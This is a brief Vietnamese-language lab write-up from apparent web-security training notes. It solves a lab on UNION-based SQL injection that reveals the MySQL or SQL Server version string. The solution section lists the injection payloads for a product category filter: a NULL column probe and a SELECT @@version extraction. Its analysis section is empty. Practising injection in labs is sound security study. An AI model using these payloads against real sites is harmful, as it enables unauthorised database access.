Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
Mô tả
Phòng thí nghiệm này chứa lỗ hổng SQL injection trong bộ lọc danh mục sản phẩm. Bạn có thể sử dụng tấn công UNION để lấy kết quả từ truy vấn được tiêm
Mục tiêu: Hiển thị chuỗi phiên bản cơ sở dữ liệu.
Phân tích
Giải pháp
'+UNION+SELECT+NULL,NULL--+
(Thêm dấu cộng vì trong mysql yêu cầu có dấu cách sau chú thích )
+union+select+null,null--+
'+UNION+SELECT+%40%40version,'a'--+
PreviousLab: SQL injection attack, querying the database type and version on OracleNextLab: SQL injection attack, listing the database contents on non-Oracle databases
Last updated